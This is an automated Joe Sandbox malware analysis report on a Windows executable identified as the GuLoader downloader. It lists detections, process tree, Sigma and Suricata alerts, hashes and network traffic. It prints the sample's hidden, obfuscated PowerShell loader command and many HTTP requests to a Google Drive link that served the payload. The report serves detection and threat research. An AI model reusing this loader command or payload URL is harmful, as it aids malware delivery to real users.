Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
You7ynHizy.exe

Overview

General Information

Sample name:You7ynHizy.exe
renamed because original name is a hash value
Original sample name:a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013.exe
Analysis ID:1587590
MD5:98e8e7c349cbb65b53681757dc2959ae
SHA1:8fbb5f9c2a9e524c39ab6269a083353a898d5b57
SHA256:a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • You7ynHizy.exe (PID: 2100 cmdline: "C:\Users\user\Desktop\You7ynHizy.exe" MD5: 98E8E7C349CBB65B53681757DC2959AE)
    • powershell.exe (PID: 5036 cmdline: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5692 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2532691410.0000000009A59000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.3375229817.0000000004F19000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Msiexec Initiated Connection
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5692, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49917
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5036, TargetFilename: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)", CommandLine: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\You7ynHizy.exe", ParentImage: C:\Users\user\Desktop\You7ynHizy.exe, ParentProcessId: 2100, ParentProcessName: You7ynHizy.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)", ProcessId: 5036, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T15:16:58.717092+010028032702Potentially Bad Traffic192.168.2.649917142.250.185.110443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: You7ynHizy.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exeAvira: detection malicious, Label: TR/Injector.ljese
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exeReversingLabs: Detection: 65%
      Multi AV Scanner detection for submitted file
      Source: You7ynHizy.exeVirustotal: Detection: 65%Perma Link
      Source: You7ynHizy.exeReversingLabs: Detection: 65%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
      Source: You7ynHizy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49917 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:49923 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49967 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50000 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50015 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50017 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50019 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50023 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50025 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50028 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50031 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50033 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50035 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50039 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50041 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50043 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50048 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50049 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50052 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: You7ynHizy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2522365385.00000000081C3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb7 source: powershell.exe, 00000002.00000002.2511053317.0000000002BC9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49917 -> 142.250.185.110:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
